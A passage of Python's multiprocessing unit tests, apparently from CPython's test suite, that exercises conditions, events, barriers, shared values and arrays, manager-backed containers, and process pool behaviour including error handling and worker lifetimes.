@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_del_pool(self):
p = self.Pool(1)
wr = weakref.ref(p)
del p
gc.collect()
self.assertIsNone(wr())
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
